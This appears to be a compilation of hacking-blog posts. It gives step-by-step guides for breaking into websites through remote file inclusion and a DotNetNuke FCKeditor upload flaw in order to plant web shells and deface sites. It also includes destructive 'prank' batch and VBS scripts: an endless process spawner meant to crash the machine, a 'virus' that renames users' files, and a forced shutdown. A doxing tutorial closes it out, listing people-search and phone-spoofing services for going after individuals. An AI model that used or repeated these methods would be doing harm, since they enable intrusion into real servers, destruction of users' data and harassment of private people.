RFI (Remote file Inclusion)

Well friends today i am writing about how to hack a website which is RFI vulnerable . RFI means you can upload or link any remote file to the website. If you are lucky enough then you will be able to execute your script as a result you can own that server or you can deface that website completely. If the server is unpatched then it can be exploited using this vulnerability. This method is as powerful as SQL injection and requires a little brain compared to later. So guys lets have a look on how to get a RFI vulnerable site and how to hack it :)

Before going below make sure that you are using strong proxy :P

To find a RFI vulnerable website you can use google dorks. If you need dorks then mail me i'll send you huge list of dorks .
for example :
http://targetsite.com/index.php?page=home


you can easily guess what above url is doing , it simply fetches some text data from server and displaying it in webpage. This is the stage where you need a little brain and your creativity :P
let's say i am changing above url as :


http://targetsite.com/index.php?page=http://www.google.com

If you are redirected to google's page then you got RFI vulnerability is site woooohhhhhhh.....

real example :http://www.cbspk.com/v2/index.php?page=http://www.google.com.
This site is RFI vulnerable but server is patched

Don't get too much excited because now real stuff starts. so keep ypur eyes open.
Now what you all need to do is upload your shell in your server and redirect target site to that shell. If your shell successfully executes then its time to party....now you can handle your target site. If your shell does not executes then dont worry try once more by adding nullbyte , even if u dont succeed try using changing shells extension like shell.php to shell.php;jpg.


NOTE:shell will only execute if server has php support and is unpatched.


Now here you may also need some basic knowledge about bash commands because now days most of the servers are on LINUX.
i wish you happy hacking :=)

Lock folders without any software

Guys this is a cool trick by which we can lock our folder without using any software. All you need to do is copy the code written below and save it as "my folder.bat". You can also make an executable file of this .bat file by using "bat to exe converter". In the code below password is "hackersgallery" you can replace this with your own password . :)


cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Enter password to lock folder or for cancel press N
set/p "cho=>"
if %cho%==hackersgallery goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==hackersgallery goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

Cool Notepad hacks

This will pop up endless notepads until the computer freezes and crashes
Copy the below code in notepad and save it as ".vbs" extension
Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

(======================================================)
CAPS LOCK CRAZY TRICK
Copy the below code in notepad and save it as ".vbs" extension



Code:-
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

(======================================================)
UNLIMITED BACKSPACE HACK

This makes it so the backspace key is constantly being pressed.

Code:-
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop



(======================================================)

Hack your friend's keyboard and make him type "You are a fool" simultaneously:

Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

(======================================================)

Convey your friend a message and shut down his / her computer:
Save it as "Anything.BAT" in All Files 

Code:
@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

(======================================================)

Disable yor internet temporarily
save it as anything.bat 


code :
ipconfig /release

(======================================================)

Copy the text in a notepad and save it as virus.bat

Dont open file in your own pc 

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

(======================================================)


Copy the text in a notepad and save it as virus.vbs

code :

Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next


(======================================================)
USE TO SWAP MOUSE BUTTONS
copy it and save it as .bat file format

code :

@ echo off
rem ---------------------------------
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ---------------------------------

(======================================================)

thanks if you like i'll post some more cool tricks :)

Hack a site using DNN

This method is simple but many sites got hacked using this method including gov sites and military sites.

If server is not patched then you can easily upload your shell their and execute that shell as a result you can deface that site. but i recommend you to not deface sites , just use this info for your knowledge.

eg of this attack --> http://www.liadvantage.info/portals/0/hacked_by_00733.jpg

i think u have got. 

Before going below make yourself sure that you are using a strong proxy server :|

1st Find The DNN 

Go To Any Search Engine

Take Google

And Search This Dork

:inurl:/tabid/36/language/en-US/Default.aspx
                                  OR

inurl : /portals/0/

See The Results And select any site as target

You Will See This Part In Every Site That You Searched For

/Home/tabid/36/Language/en-US/Default.aspx

Now Replace This With

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx (exploiting)

You Will Enter In The Gallery Page

Now Select

File ( A File On Your Site )

At This Point Copy This Java Script And Paste It In The Address Bar

javascript:__doPostBack('ctlURL$cmdUpload','')    {call doPostBack method to upload local files}



You Will Find The Upload Option

Select Root And Upload Your File

Your File Then Will Be In The Root

Then Put This In End Of URL

portals/0/yourfile.yourfile format

Your Done Enjoy !!!

White paper......on server rooting (rooting linux boxes)

Today i am very happy and impressed by my friend's work he has written a paper on how to root linux box. After rooting server you can then own every site of that box.
##################################################################

# Title: Rooting Linux boxes for beginners
# Date : 25 January 2011
# Author: Cyb3R_ShubhaM aKa L0c4lr00T
# Email: l0c4lr00t[at]yahoo.in
# Official Mail: ShubhaM[at]AcademyOfhacking.com
# Facebook: fb[dot]me/yoShubH

###################################################################
here i am posting direct link to his paper--> http://goo.gl/FmwUY 


kudos goes to cyb3r Shubh4m

Doxing Tutorial (Get Personal details)

suppose you want information about someone..
EX:
Name
Relatives
IP
Bio
Location
Profile Links
Email

And anything else that we could find. But DOXing isn’t all about just writing down information. You sometimes have to use your deductive reasoning to figure things out. The main thing about DOXing is that you want to move pretty fast, but also give yourself some time to look over the information that you’ve gotten. So I’m sure some of you (the new people to this section) are wondering “What are the best sites to find DOX?” well here ya go.

http://www.pipl.com
(Searches for emails, names, usernames, etc.)

http://www.google.com
(Searches for everything)

Reverse Search for pictures:
http://www.tineye.com

Reverse area code search:
http://www.telcodata.us/telcodata/telco

Reverse Phone number search:
http://www.whitepages.com
http://www.411.com

***Us*** Criminal Record Check:
http://www.criminalsearches.com/

Realtor Home search:
http://www.realtor.ca/

Ancestry Search:
http://search.ancestry.com/

Electoral Roll:
Births
Marriages
Deaths
Company Director Addresses
http://www.lookuppeople.co.uk/

Internet Archive:
http://www.archive.org/web/web.php

Reverse IP:
Primary : accurate country/ isp : http://www.whois.sc/iphere
http://www.ipgp.net/
http://www.ip2location.com/free.asp
http://www.ip-adress.com/ip_tracer/

Temporary Mail:
http://www.mailinator.com/

Anonymous email sending:
http://mail.anonymizer.name/
http://www.sendanonymoussms.com/

Secondary people search other then pipl.com
http://www.com.lullar.com

Gather Information on people’s cameras by just uploading an image:
http://regex.info/exif.cgi

once the target is accuired send free empty boxes:
http://www.usps.com/

Telephone Spoofing:
http://www.telespoof.com/freecall/agi

So Easy na............................

there are many other things to do....................:)